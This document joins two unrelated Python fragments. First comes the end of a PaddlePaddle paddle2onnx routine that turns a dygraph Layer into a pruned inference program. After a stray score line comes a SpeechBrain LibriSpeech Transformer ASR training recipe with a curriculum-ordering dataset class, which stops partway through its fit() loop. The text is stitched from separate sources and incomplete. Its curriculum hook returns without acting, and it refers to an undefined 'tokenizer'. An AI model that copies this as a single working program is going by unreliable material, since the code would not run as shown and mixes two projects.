"to_static(input_spec=[]) and jit.save(input_spec=[]) " \
"and make sure they are consistent."
name_no_exists_error = "The tensor `%s` does not exists. " \
"Please make sure the name of InputSpec or example Tensor " \
"in input_spec is the same as the name of InputSpec in " \
"`to_static` decorated on the Layer.forward method."
result_list = []
input_var_names = [
var.name for var in flatten(inputs) if isinstance(var, Variable)
]
if input_spec is None:
# no prune
return input_var_names
else:
        # filter out non-tensor type spec infos.
input_spec = [
spec for spec in input_spec
if isinstance(spec, paddle.static.InputSpec)
]
if len(input_spec) == len(input_var_names):
# no prune
result_list = input_var_names
# if input spec name not in input_var_names, only raise warning
for spec in input_spec:
if spec.name is None:
warnings.warn(name_none_error % spec)
elif spec.name not in input_var_names:
warnings.warn(name_no_exists_error % spec.name)
else:
# do nothing
pass
else:
# prune
for spec in input_spec:
if spec.name is None:
# name is None, the input_spec only can be InputSpec
raise ValueError(name_none_error % spec)
elif spec.name not in input_var_names:
# the input_spec can be `InputSpec` or `VarBase`
raise ValueError(name_no_exists_error % spec.name)
else:
result_list.append(spec.name)
return result_list
def _get_output_vars(outputs, output_spec):
name_no_exists_error = "The tensor `%s` does not exists. " \
"Please make sure the name of example Tensor " \
"in configs.output_spec is the output tensor of " \
"Layer.forward method."
result_list = []
output_vars_dict = OrderedDict()
for var in flatten(outputs):
if isinstance(var, Variable):
output_vars_dict[var.name] = var
if output_spec is None:
result_list = output_vars_dict.values()
elif output_spec is not None and len(output_spec) == len(output_vars_dict):
result_list = output_vars_dict.values()
for var in output_spec:
if var.name not in output_vars_dict:
warnings.warn(name_no_exists_error % var.name)
else:
for var in output_spec:
if var.name not in output_vars_dict:
raise ValueError(name_no_exists_error % var.name)
else:
result_list.append(output_vars_dict[var.name])
return result_list
@dygraph.base.switch_to_static_graph
def get_program(layer, input_spec, output_spec, **configs):
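    """Trace a dygraph ``Layer`` into a pruned, inference-ready static program.

    Returns the static ``main_program`` together with the feed variable names
    and the fetch variables, ready to be exported (e.g. converted to ONNX).
    """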
paddle.jit.set_verbosity(0)
prog_translator = ProgramTranslator()
if not prog_translator.enable_to_static:
raise RuntimeError(
"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False."
)
if not isinstance(layer, Layer):
raise TypeError(
"The input of paddle2onnx should be 'Layer', but received input type is %s."
% type(layer))
if isinstance(layer, paddle.DataParallel):
inner_layer = layer._layers
else:
inner_layer = layer
# avoid change user given input_spec
inner_input_spec = None
if input_spec is not None:
for attr_func in dir(inner_layer):
static_func = getattr(inner_layer, attr_func, None)
if isinstance(static_func,
StaticFunction) and 'forward' != attr_func:
raise ValueError(
"If there are static functions other than 'forward' that need to be saved, the input 'input_spec' should be None, but received the type of 'input_spec' is %s."
% type(input_spec))
if not isinstance(input_spec, (list, tuple)):
raise TypeError(
"The input input_spec should be 'list', but received input_spec's type is %s."
% type(input_spec))
inner_input_spec = []
for var in flatten(input_spec):
if isinstance(var, paddle.static.InputSpec):
inner_input_spec.append(var)
elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)):
inner_input_spec.append(
paddle.static.InputSpec.from_tensor(var))
else:
# NOTE(Aurelius84): Support non-Tensor type in `input_spec`.
inner_input_spec.append(var)
extra_var_info = dict()
functions = dir(inner_layer)
for attr_func in functions:
static_func = getattr(inner_layer, attr_func, None)
if isinstance(static_func, StaticFunction):
concrete_program = static_func.concrete_program_specify_input_spec(
inner_input_spec)
elif 'forward' == attr_func:
# transform in jit.save, if input_spec is incomplete, declarative will throw error
# inner_input_spec is list[InputSpec], it should be packed with same structure
# as original input_spec here.
if inner_input_spec:
inner_input_spec = pack_sequence_as(input_spec,
inner_input_spec)
static_forward = declarative(
inner_layer.forward, input_spec=inner_input_spec)
concrete_program = static_forward.concrete_program
# the input_spec has been used in declarative, which is equal to
# @declarative with input_spec and jit.save without input_spec,
# avoid needless warning
inner_input_spec = None
else:
continue
input_var_names = _get_input_var_names(concrete_program.inputs,
inner_input_spec)
# NOTE(chenweihang): [ Get output variables ]
# the rule is like [ Get input variables name ]. For output var,
# we only support VarBase spec, and actually, we only need the
# var name of output, and we don't recommended to use output_spec
output_vars = _get_output_vars(concrete_program.outputs, output_spec)
feeded_var_names = input_var_names
target_vars = output_vars
main_program = concrete_program.main_program.clone()
export_for_deployment = True
if isinstance(feeded_var_names, six.string_types):
feeded_var_names = [feeded_var_names]
elif export_for_deployment:
if len(feeded_var_names) > 0:
# TODO(paddle-dev): polish these code blocks
if not (bool(feeded_var_names) and all(
isinstance(name, six.string_types)
for name in feeded_var_names)):
raise ValueError("'feed_var_names' should be a list of str.")
if isinstance(target_vars, Variable):
target_vars = [target_vars]
elif export_for_deployment:
if not (bool(target_vars) and
all(isinstance(var, Variable) for var in target_vars)):
raise ValueError("'target_vars' should be a list of Variable.")
main_program = _get_valid_program(main_program)
# remind user to set auc_states to zeros if the program contains auc op
all_ops = main_program.global_block().ops
for op in all_ops:
# clear device of Op
device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName()
op._set_attr(device_attr_name, "")
if op.type == 'auc':
warnings.warn(
"please ensure that you have set the auc states to zeros before saving inference model"
)
break
with program_guard(main_program):
uniq_target_vars = []
for i, var in enumerate(target_vars):
uniq_target_vars.append(var)
target_vars = uniq_target_vars
target_var_name_list = [var.name for var in target_vars]
origin_program = main_program.clone()
main_program = main_program.clone()
global_block = main_program.global_block()
need_to_remove_op_index = []
for i, op in enumerate(global_block.ops):
op.desc.set_is_target(False)
if op.type == "feed" or op.type == "fetch":
need_to_remove_op_index.append(i)
for index in need_to_remove_op_index[::-1]:
global_block._remove_op(index)
main_program.desc.flush()
main_program = main_program._prune_with_input(
feeded_var_names=feeded_var_names, targets=target_vars)
main_program = main_program._inference_optimize(prune_read_op=True)
fetch_var_names = [v.name for v in target_vars]
for target_v in target_vars:
if not main_program.global_block().has_var(target_v.name):
main_program.global_block().create_var(
name=target_v.name,
shape=target_v.shape,
dtype=target_v.dtype,
persistable=target_v.persistable)
prepend_feed_ops(main_program, feeded_var_names)
append_fetch_ops(main_program, fetch_var_names)
main_program.desc._set_version()
paddle.fluid.core.save_op_version_info(main_program.desc)
main_program._copy_dist_param_info_from(origin_program)
return main_program, feeded_var_names, target_vars
| 1.945313 | 2 |
recipes/LibriSpeech/ASR/transformer/train_cl.py | Darshan7575/speechbrain | 0 | 12796225 | <reponame>Darshan7575/speechbrain
#!/usr/bin/env python3
"""Recipe for training a Transformer ASR system with librispeech.
The system employs an encoder, a decoder, and an attention mechanism
between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural
language model.
To run this recipe, do the following:
> python train.py hparams/transformer.yaml
> python train.py hparams/conformer.yaml
With the default hyperparameters, the system employs a convolutional frontend and a transformer.
The decoder is based on a Transformer decoder. Beamsearch coupled with a Transformer
language model is used on the top of decoder probabilities.
The neural network is trained on both CTC and negative-log likelihood
targets and sub-word units estimated with Byte Pairwise Encoding (BPE)
are used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).
The best model is the average of the checkpoints from last 5 epochs.
The experiment file is flexible enough to support a large variety of
different systems. By properly changing the parameter files, you can try
different encoders, decoders, tokens (e.g, characters instead of BPE),
training split (e.g, train-clean 100 rather than the full one), and many
other possible variations.
Authors
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2021
"""
import math
import os
import torch
from torch.utils.tensorboard import SummaryWriter
import sys
import logging
from pathlib import Path
import speechbrain as sb
from hyperpyyaml import load_hyperpyyaml
from speechbrain.utils.distributed import run_on_main
from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset
from speechbrain.dataio.sampler import ReproducibleRandomSampler
from tqdm.contrib import tqdm
import numpy as np
from functools import cmp_to_key
from torch.utils.data import DataLoader
from speechbrain.dataio.dataloader import LoopedLoader
from speechbrain.core import Stage
import time
def make_dataloader(
dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs,
):
# TRAIN stage is handled specially.
dataloader = sb.dataio.dataloader.make_dataloader(
dataset, **loader_kwargs
)
return dataloader
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
def curriculum_based_filtered_sorted(
self,
key_min_value={},
key_max_value={},
key_test={},
min_weight=None,
max_weight=None,
weights=None,
ordering_info="",
batch_selection="contiguous",
batch_size=8,
select_n=None,
):
"""Get a filtered and/or sorted version of this based on specified curriculum, shares static data.
The reason to implement these operations in the same method is that
computing some dynamic items may be expensive, and this way the
filtering and sorting steps don't need to compute the dynamic items
twice.
Arguments
---------
key_min_value : dict
Map from key (in data or in dynamic items) to limit, will only keep
data_point if data_point[key] >= limit
key_max_value : dict
Map from key (in data or in dynamic items) to limit, will only keep
data_point if data_point[key] <= limit
key_test : dict
Map from key (in data or in dynamic items) to func, will only keep
data_point if bool(func(data_point[key])) == True
min_weight : None, int
If not None, will only keep data_point if weight[data_point] > min_weight
max_weight : None, int
If not None, will only keep data_point if weight[data_point] < max_weight
weights : None, dict
Map from data_id to weight, these weight(s) will be used to sort the dataset.
ordering_info : str
Information to create weights based on pre-defined keys( and/or methods) and their order.
- Format : "<key1>:<order1>,<key2>:<order2>,........"
- Options for keys: `input_length`, `output_length`, `alphabetic`
- Options for order: `asc`, `desc`
- Example:
* "input_length:asc,output_length:desc" -
Sort the dataset using ``input_length`` in ascending order ,
tie is broken using ``output_length`` in descending order
Note: This is used only if `weights` is None
batch_selection : str
Information on how to order batches.
- Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted`
- Example:
* "random" -
After dataset is ordered based on `ordering_info`,
divide the dataset into batches of size `batch_size`
and order these batches randomly to create final dataset
batch_size : 8, int
Used to divide the dataset into batches. This helps in ordering the dataset at batch level.
select_n : None, int
If not None, only keep (at most) the first n filtered data_points.
The possible sorting is applied, but only on the first n data
points found. Meant for debugging.
Returns
-------
FilteredSortedDynamicItemDataset
Shares the static data, but has its own output keys and
dynamic items (initially deep copied from this, so they have the
same dynamic items available)
"""
# ordering type can be random, sorted
# keys for ordering info can be , input_length, output_length, alphabetic
dataset_ordering = self._parse_dataset_order(ordering_info)
ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"
filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test)
# order entire dataset
if ordering_type == "random":
weights = self._random_shuffled_weights(filtered_data_ids)
elif ordering_type == "sorted":
if weights == None:
# Create dataset using ordering info
weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering)
else:
pass
else:
raise NotImplementedError(
"Ordering Type must be one of random, sorted, weighted_sorted."
)
# order batchwise
if batch_selection == "contiguous":
pass
elif batch_selection == "random":
weights = self._random_shuffled_batches(weights, batch_size)
elif batch_selection == "sorted":
pass
elif batch_selection == "reverse-sorted":
weights = self._reverse_sort_batches(weights, batch_size)
else:
raise NotImplementedError(
"Ordering Type must be one of random, sorted, weighted_sorted."
)
# create Dataloader using the weights
filtered_sorted_ids = self._weighted_filtered_sorted_ids(
weights, min_weight, max_weight, select_n
)
return FilteredSortedDynamicItemDataset(
self, filtered_sorted_ids
)
def _filter_dataset(
self,
data_ids,
key_min_value={},
key_max_value={},
key_test={}
):
"""Returns a list of data ids, fulfilling the filtering criteria."""
def combined_filter(computed, key_min_value, key_max_value, key_test):
"""Checks if the data example fulfills the filtering criteria"""
for key, limit in key_min_value.items():
if computed[key] >= limit:
continue
return False
for key, limit in key_max_value.items():
if computed[key] <= limit:
continue
return False
for key, func in key_test.items():
if bool(func(computed[key])):
continue
return False
return True
temp_keys = (
set(key_min_value.keys())
| set(key_max_value.keys())
| set(key_test.keys())
)
filtered_data_ids = []
with self.output_keys_as(temp_keys):
for i, data_id in enumerate(data_ids):
data_point = self.data[data_id]
data_point["id"] = data_id
computed = self.pipeline.compute_outputs(data_point)
if combined_filter(computed, key_min_value, key_max_value, key_test):
filtered_data_ids.append(data_id)
return filtered_data_ids
def _weighted_filtered_sorted_ids(
self,
weights,
min_value=None,
max_value=None,
select_n=None,
reverse=False
):
"""Returns a list of data ids, filtered and sorted using custom weights"""
def weights_filter(weights,min_value,max_value):
"""Checks if the data example has weight within the range (`min_value`, `max_value`)"""
if min_value == None and max_value == None:
return weights
if isinstance(min_value,int):
min_value = float(min_value)
if isinstance(max_value,int):
max_value = float(max_value)
            # Iterate over a snapshot so entries can be popped from ``weights``
            # while filtering, without a "dict changed size" RuntimeError.
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or \
                        (isinstance(max_value, float) and value > max_value):
                    weights.pop(key, None)
return weights
filtered_weights = weights_filter(weights,min_value,max_value)
filtered_ids = []
for i, data_id in enumerate(weights.keys()):
if select_n is not None and len(filtered_ids) == select_n:
break
filtered_ids.append((weights[data_id],i,data_id))
filtered_sorted_ids = [
tup[2] for tup in sorted(filtered_ids, reverse=reverse)
]
return filtered_sorted_ids
def _parse_dataset_order(
self,
dataset_order=""
):
"""Takes in `ordering_info` in string as input and creates a dictionary out of it"""
ordering_info = []
orderings = dataset_order.split(",")
for order in orderings:
if order.strip() == '':
continue
column,order = order.split(":")
ordering_info.append({"key":column,"order":order})
return ordering_info
def _random_shuffle_data_ids(
self,
data_ids
):
"""Shuffle the data_ids in random order"""
return np.random.permutation(data_ids)
def _random_shuffled_weights(
self,
data_ids
):
"""Create random weightages for data_ids"""
shuffled_ids = self._random_shuffle_data_ids(data_ids)
weights = {}
for index,id in enumerate(shuffled_ids):
weights[id] = index
return weights
def _random_shuffled_batches(
self,
weights=None,
batch_size=8,
reverse=False
):
"""Randomly shuffle the dataset at batch level"""
        # Rebuild the ordered id list: position i holds the id whose weight is i.
        data_ids = [None] * len(weights)
        for data_id, weight in weights.items():
            data_ids[weight] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
shuffled_data_ids += data_ids[start_index:end_index]
assert len(shuffled_data_ids) == len(data_ids) , "OOPS!! Batchwise shuffling gone wrong."
weights = {}
for index,data_id in enumerate(shuffled_data_ids):
weights[data_id] = index
return weights
def _reverse_sort_batches(
self,
weights=None,
batch_size=8
):
"""Reverse sort the dataset at batch level"""
        # Rebuild the ordered id list: position i holds the id whose weight is i.
        data_ids = [None] * len(weights)
        for data_id, weight in weights.items():
            data_ids[weight] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
shuffled_data_ids += data_ids[start_index:end_index]
assert len(shuffled_data_ids) == len(data_ids) , "OOPS!! Batchwise sorting gone wrong."
weights = {}
for index,data_id in enumerate(shuffled_data_ids):
weights[data_id] = index
return weights
def _custom_sorted_weights(
self,
data_ids,
dataset_orderings
):
"""Create `weights` for data points using `ordering_info`"""
def compare(key1,key2):
"""
Comparing logic, as `ordering_info` can contain multiple keys
Note:
Value and its meaning
* 1 - key1 > key2
* -1 - key1 < key2
* 0 - key1 = key2
"""
for ordering in dataset_orderings:
key = ordering["key"]
order = 1 if ordering["order"] == "asc" else -1
if key == "input_length":
res = self._input_length_comparator(key1,key2)
elif key == "output_length":
res = self._output_length_comparator(key1,key2)
elif key == "alphabetic":
res = self._alphabetic_comparator(key1,key2)
res *= order
# If comparison using `key` returned data points as equal, continue
# comparing using the next key, else return the result
if res == 0:
continue
else:
return res
return res
shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare))
weights = {}
for index,id in enumerate(sorted_data_ids):
weights[id] = index
return weights
def _input_length_comparator(
self,
key1,
key2
):
"""Compare two data points based on input length"""
duration1 = float(self.data[key1]["duration"])
duration2 = float(self.data[key2]["duration"])
if duration1 > duration2:
return 1
elif duration1 < duration2:
return -1
else:
return 0
def _output_length_comparator(
self,
key1,
key2
):
"""Compare two data points based on output length"""
length1 = len(self.data[key1]["wrd"])
length2 = len(self.data[key2]["wrd"])
if length1 > length2:
return 1
elif length1 < length2:
return -1
else:
return 0
def _alphabetic_comparator(
self,
key1,
key2
):
"""Compare two data points based on alphabetic order"""
text1 = self.data[key1]["wrd"]
text2 = self.data[key2]["wrd"]
if text1 > text2:
return 1
elif text1 < text2:
return -1
else:
return 0
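# Editor's illustrative sketch (hypothetical paths/values): typical use of the
# curriculum dataset defined above, mirroring what dataio_prepare() does below.
#   train_data = CurriculumOrientedDynamicDataset.from_csv(
#       csv_path="train.csv", replacements={"data_root": "/data"},
#   )
#   train_data = train_data.curriculum_based_filtered_sorted(
#       ordering_info="input_length:asc,output_length:desc",
#       batch_selection="random",
#       batch_size=8,
#   )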
class ASR(sb.core.Brain):
r"""Brain class abstracts away the details of data loops.
The primary purpose of the `Brain` class is the implementation of
the ``fit()`` method, which iterates epochs and datasets for the
purpose of "fitting" a set of modules to a set of data.
In order to use the ``fit()`` method, one should sub-class the ``Brain``
class and override any methods for which the default behavior does not
match the use case. For a simple use case (e.g., training a single model
with a single dataset) the only methods that need to be overridden are:
* ``compute_forward()``
* ``compute_objectives()``
The example below illustrates how overriding these two methods is done.
For more complicated use cases, such as multiple modules that need to
be updated, the following methods can be overridden:
* ``fit_batch()``
* ``evaluate_batch()``
Arguments
---------
modules : dict of str:torch.nn.Module pairs
These modules are passed to the optimizer by default if they have
trainable parameters, and will have ``train()``/``eval()`` called on them.
opt_class : torch.optim class
A torch optimizer constructor that has takes only the list of
parameters (e.g. a lambda or partial function definition). By default,
this will be passed all modules in ``modules`` at the
beginning of the ``fit()`` method. This behavior can be changed
by overriding the ``configure_optimizers()`` method.
hparams : dict
Each key:value pair should consist of a string key and a hyperparameter
that is used within the overridden methods. These will
be accessible via an ``hparams`` attribute, using "dot" notation:
e.g., self.hparams.model(x).
run_opts : dict
A set of options to change the runtime environment, including
debug (bool)
If ``True``, this will only iterate a few batches for all
datasets, to ensure code runs without crashing.
debug_batches (int)
Number of batches to run in debug mode, Default ``2``.
debug_epochs (int)
Number of epochs to run in debug mode, Default ``2``.
If a non-positive number is passed, all epochs are run.
jit_module_keys (list of str)
List of keys in ``modules`` that should be jit compiled.
distributed_count (int)
Number of devices to run on.
distributed_backend (str)
One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
device (str)
The location for performing computations.
auto_mix_prec (bool)
If ``True``, automatic mixed-precision is used.
Activate it only with cuda.
max_grad_norm (float)
Default implementation of ``fit_batch()`` uses
``clip_grad_norm_`` with this value. Default: ``5``.
nonfinite_patience (int)
Number of times to ignore non-finite losses before stopping.
Default: ``3``.
noprogressbar (bool)
Whether to turn off progressbar when training. Default: ``False``.
ckpt_interval_minutes (float)
Amount of time between saving intra-epoch checkpoints,
in minutes, default: ``15.0``. If non-positive, these are not saved.
checkpointer : speechbrain.Checkpointer
By default, this will be used to load checkpoints, and will have the
optimizer added to continue training if interrupted.
inter_epoch_dataset_updation : bool
Whether dataset must be updated every between epochs or not. It is used in CL
which takes feedback from model and reshuffles the dataset. By, default, it is False
sortagrad: int
Number of epochs, for which curriculum based dataset be used.
It can take one of three values
* ``-1`` - Use curriculum learning for all epochs
* ``n`` - Use curriculum learning for ``n`` number of epochs
By default, it is ``-1``.
"""
def __init__(
self,
modules=None,
opt_class=None,
hparams=None,
run_opts=None,
checkpointer=None,
inter_epoch_dataset_updation=False,
sortagrad=-1
):
super().__init__(
modules=modules,
opt_class=opt_class,
hparams=hparams,
run_opts=run_opts,
checkpointer=checkpointer
)
# save attributes related to curriculum learning
self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
self.ordering = self.hparams.ordering
self.batch_selection = self.hparams.batch_selection
self.sortagrad = sortagrad
# create tensorboard summary writer
self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + "/tensorboard")
def compute_forward(self, batch, stage):
"""Forward computations from the waveform batches to the output probabilities."""
batch = batch.to(self.device)
wavs, wav_lens = batch.sig
tokens_bos, _ = batch.tokens_bos
# Add augmentation if specified
if stage == sb.Stage.TRAIN:
if hasattr(self.modules, "env_corrupt"):
wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
wavs = torch.cat([wavs, wavs_noise], dim=0)
wav_lens = torch.cat([wav_lens, wav_lens])
tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)
# compute features
feats = self.hparams.compute_features(wavs)
current_epoch = self.hparams.epoch_counter.current
feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
if stage == sb.Stage.TRAIN:
if hasattr(self.hparams, "augmentation"):
feats = self.hparams.augmentation(feats)
# forward modules
src = self.modules.CNN(feats)
enc_out, pred = self.modules.Transformer(
src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
)
# output layer for ctc log-probabilities
logits = self.modules.ctc_lin(enc_out)
p_ctc = self.hparams.log_softmax(logits)
# output layer for seq2seq log-probabilities
pred = self.modules.seq_lin(pred)
p_seq = self.hparams.log_softmax(pred)
# Compute outputs
hyps = None
if stage == sb.Stage.TRAIN:
hyps = None
elif stage == sb.Stage.VALID:
hyps = None
current_epoch = self.hparams.epoch_counter.current
if current_epoch % self.hparams.valid_search_interval == 0:
# for the sake of efficiency, we only perform beamsearch with limited capacity
# and no LM to give user some idea of how the AM is doing
hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
elif stage == sb.Stage.TEST:
hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)
return p_ctc, p_seq, wav_lens, hyps
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss (CTC+NLL) given predictions and targets."""
(p_ctc, p_seq, wav_lens, hyps,) = predictions
ids = batch.id
tokens_eos, tokens_eos_lens = batch.tokens_eos
tokens, tokens_lens = batch.tokens
if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
tokens_eos_lens = torch.cat(
[tokens_eos_lens, tokens_eos_lens], dim=0
)
tokens = torch.cat([tokens, tokens], dim=0)
tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)
loss_seq = self.hparams.seq_cost(
p_seq, tokens_eos, length=tokens_eos_lens
)
loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
loss = (
self.hparams.ctc_weight * loss_ctc
+ (1 - self.hparams.ctc_weight) * loss_seq
)
if stage != sb.Stage.TRAIN:
current_epoch = self.hparams.epoch_counter.current
valid_search_interval = self.hparams.valid_search_interval
if current_epoch % valid_search_interval == 0 or (
stage == sb.Stage.TEST
):
# Decode token terms to words
predicted_words = [
tokenizer.decode_ids(utt_seq).split(" ") for utt_seq in hyps
]
target_words = [wrd.split(" ") for wrd in batch.wrd]
self.wer_metric.append(ids, predicted_words, target_words)
# compute the accuracy of the one-step-forward prediction
self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
return loss , loss_ctc, loss_seq
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
# check if we need to switch optimizer
# if so change the optimizer from Adam to SGD
self.check_and_reset_optimizer()
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
# normalize the loss by gradient_accumulation step
(loss / self.hparams.gradient_accumulation).backward()
if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
self.check_gradients(loss)
self.optimizer.step()
self.optimizer.zero_grad()
# anneal lr every update
self.hparams.noam_annealing(self.optimizer)
return loss.detach() , loss_ctc.detach(), loss_seq.detach()
def evaluate_batch(self, batch, stage):
"""Computations needed for validation/test batches"""
with torch.no_grad():
predictions = self.compute_forward(batch, stage=stage)
loss, _, _ = self.compute_objectives(predictions, batch, stage=stage)
return loss.detach()
def on_stage_start(self, stage, epoch):
"""Gets called at the beginning of each epoch"""
if stage != sb.Stage.TRAIN:
self.acc_metric = self.hparams.acc_computer()
self.wer_metric = self.hparams.error_rate_computer()
def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of a epoch."""
# Compute/store important stats
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
else:
stage_stats["ACC"] = self.acc_metric.summarize()
current_epoch = self.hparams.epoch_counter.current
valid_search_interval = self.hparams.valid_search_interval
if (
current_epoch % valid_search_interval == 0
or stage == sb.Stage.TEST
):
stage_stats["WER"] = self.wer_metric.summarize("error_rate")
# log stats and save checkpoint at end-of-epoch
if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
# report different epoch stages according current stage
current_epoch = self.hparams.epoch_counter.current
if current_epoch <= self.hparams.stage_one_epochs:
lr = self.hparams.noam_annealing.current_lr
steps = self.hparams.noam_annealing.n_steps
optimizer = self.optimizer.__class__.__name__
else:
lr = self.hparams.lr_sgd
steps = -1
optimizer = self.optimizer.__class__.__name__
epoch_stats = {
"epoch": epoch,
"lr": lr,
"steps": steps,
"optimizer": optimizer,
}
self.hparams.train_logger.log_stats(
stats_meta=epoch_stats,
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta={"ACC": stage_stats["ACC"], "epoch": epoch},
max_keys=["ACC"],
num_to_keep=5,
)
elif stage == sb.Stage.TEST:
self.hparams.train_logger.log_stats(
stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
test_stats=stage_stats,
)
with open(self.hparams.wer_file, "w") as w:
self.wer_metric.write_stats(w)
# save the averaged checkpoint at the end of the evaluation stage
# delete the rest of the intermediate checkpoints
# ACC is set to 1.1 so checkpointer only keeps the averaged checkpoint
self.checkpointer.save_and_keep_only(
meta={"ACC": 1.1, "epoch": epoch},
max_keys=["ACC"],
num_to_keep=1,
)
def recreate_train_dataset(self,epoch):
"""Gets called at the end of a epoch. This is used to handle , whether the dataset needs to be reshuffled at the end of epoch """
if self.inter_epoch_dataset_updation:
if self.sortagrad != -1:
# number of epochs for which curriculum must be used is defined
if self.sortagrad < epoch:
# recreate dataset using random shuffling
return
else:
# recreate dataset using preferred cl approach
return
else:
# recreate dataset using preferred cl approach
return
else:
if self.sortagrad != -1:
# number of epochs for which curriculum must be used is defined
if self.sortagrad < epoch:
# recreate dataset using random shuffling
return
else:
return
def check_and_reset_optimizer(self):
"""reset the optimizer if training enters stage 2"""
current_epoch = self.hparams.epoch_counter.current
if not hasattr(self, "switched"):
self.switched = False
if isinstance(self.optimizer, torch.optim.SGD):
self.switched = True
if self.switched is True:
return
if current_epoch > self.hparams.stage_one_epochs:
self.optimizer = self.hparams.SGD(self.modules.parameters())
if self.checkpointer is not None:
self.checkpointer.add_recoverable("optimizer", self.optimizer)
self.switched = True
def on_fit_start(self):
"""Initialize the right optimizer on the training start"""
super().on_fit_start()
# if the model is resumed from stage two, reinitialize the optimizer
current_epoch = self.hparams.epoch_counter.current
current_optimizer = self.optimizer
if current_epoch > self.hparams.stage_one_epochs:
del self.optimizer
self.optimizer = self.hparams.SGD(self.modules.parameters())
# Load latest checkpoint to resume training if interrupted
if self.checkpointer is not None:
# do not reload the weights if training is interrupted right before stage 2
group = current_optimizer.param_groups[0]
if "momentum" not in group:
return
self.checkpointer.recover_if_possible(
device=torch.device(self.device)
)
def fit(
self,
epoch_counter,
train_set,
valid_set=None,
progressbar=None,
train_loader_kwargs={},
valid_loader_kwargs={},
):
"""Iterate epochs and datasets to improve objective.
Relies on the existence of multiple functions that can (or should) be
overridden. The following methods are used and expected to have a
certain behavior:
* ``fit_batch()``
* ``evaluate_batch()``
* ``update_average()``
If the initialization was done with distributed_count > 0 and the
distributed_backend is ddp, this will generally handle multiprocess
logic, like splitting the training data into subsets for each device and
only saving a checkpoint on the main process.
Arguments
---------
epoch_counter : iterable
Each call should return an integer indicating the epoch count.
train_set : Dataset, DataLoader
A set of data to use for training. If a Dataset is given, a
DataLoader is automatically created. If a DataLoader is given, it is
used directly.
valid_set : Dataset, DataLoader
A set of data to use for validation. If a Dataset is given, a
DataLoader is automatically created. If a DataLoader is given, it is
used directly.
train_loader_kwargs : dict
Kwargs passed to `make_dataloader()` for making the train_loader
(if train_set is a Dataset, not DataLoader).
E.G. batch_size, num_workers.
DataLoader kwargs are all valid.
valid_loader_kwargs : dict
Kwargs passed to `make_dataloader()` for making the valid_loader
(if valid_set is a Dataset, not DataLoader).
E.g., batch_size, num_workers.
DataLoader kwargs are all valid.
progressbar : bool
Whether to display the progress of each epoch in a progressbar.
"""
if not (
isinstance(train_set, DataLoader)
or isinstance(train_set, LoopedLoader)
):
train_set = self.make_dataloader(
train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
)
if valid_set is not None and not (
isinstance(valid_set, DataLoader)
or isinstance(valid_set, LoopedLoader)
):
valid_set = self.make_dataloader(
valid_set,
stage=sb.Stage.VALID,
ckpt_prefix=None,
**valid_loader_kwargs,
)
self.on_fit_start()
self.train_set = train_set
total_steps = len(train_set)
if progressbar is None:
progressbar = not self.noprogressbar
# Iterate epochs
for epoch in epoch_counter:
# Training stage
self.on_stage_start(Stage.TRAIN, epoch)
self.modules.train()
# Reset nonfinite count to 0 each epoch
self.nonfinite_count = 0
if self.train_sampler is not None and hasattr(
self.train_sampler, "set_epoch"
):
self.train_sampler.set_epoch(epoch)
# Time since last intra-epoch checkpoint
last_ckpt_time = time.time()
# Only show progressbar if requested and main_process
enable = progressbar and sb.utils.distributed.if_main_process()
completed_steps = (epoch - 1) * total_steps
with tqdm(
self.train_set,
initial=self.step,
dynamic_ncols=True,
disable=not enable,
) as t:
for batch in t:
self.step += 1
global_step = completed_steps + self.step
loss, loss_ctc, loss_seq = self.fit_batch(batch)
self.avg_train_loss = self.update_average(
loss, self.avg_train_loss
